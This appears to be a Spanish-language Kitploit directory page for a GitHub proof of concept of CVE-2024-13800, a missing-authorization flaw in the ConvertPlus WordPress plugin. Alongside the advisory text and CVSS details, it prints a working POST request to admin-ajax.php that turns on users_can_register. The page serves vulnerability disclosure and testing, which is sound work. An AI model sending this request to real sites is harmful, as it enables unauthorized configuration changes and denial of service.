Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-13800 — Plugin de Popup para WordPress - ConvertPlus <= 3.5.30 - Autorización faltante para que usuarios autenticados (Suscriptor+) realicen una actualización limitada de opciones | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-13800
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónMala Configuración
GitHubrandomrobbiebf/cve-2024-13800

CVE-2024-13800

Plugin de Popup para WordPress - ConvertPlus <= 3.5.30 - Autorización faltante para que usuarios autenticados (Suscriptor+) realicen una actualización limitada de opciones

Ver Repositorio
12hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-13800

Popup Plugin For WordPress - ConvertPlus <= 3.5.30 - Autorización faltante para actualización limitada de opciones por parte de usuarios autenticados (Suscriptor+)

Descripción

El plugin ConvertPlus para WordPress es vulnerable a la modificación no autorizada de datos que puede conducir a una denegación de servicio debido a una falta de verificación de capacidades en el endpoint AJAX 'cp_dismiss_notice' en todas las versiones hasta la 3.5.30 incluida. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, actualicen valores de opciones a '1' en el sitio WordPress. Esto puede aprovecharse para actualizar una opción que generaría un error en el sitio y denegaría el servicio a usuarios legítimos, o para establecer algunos valores como verdaderos, como el registro.

Detalles

  • Tipo: plugin
  • Slug: convertplug
  • Versión afectada: 3.5.30
  • Puntuación CVSS: 8.1
  • Clasificación CVSS: Alta
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-13800
  • Estado: Privado

Notas

Solo introduce un 1 en la base de datos, por lo que solo se puede poner un 1 en users_can_register

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: kubernetes.docker.internal:5555 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 50 Origin: http://kubernetes.docker.internal:5555 Connection: keep-alive Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011 action=cp_dismiss_notice&notice=users_can_register
Descargar herramienta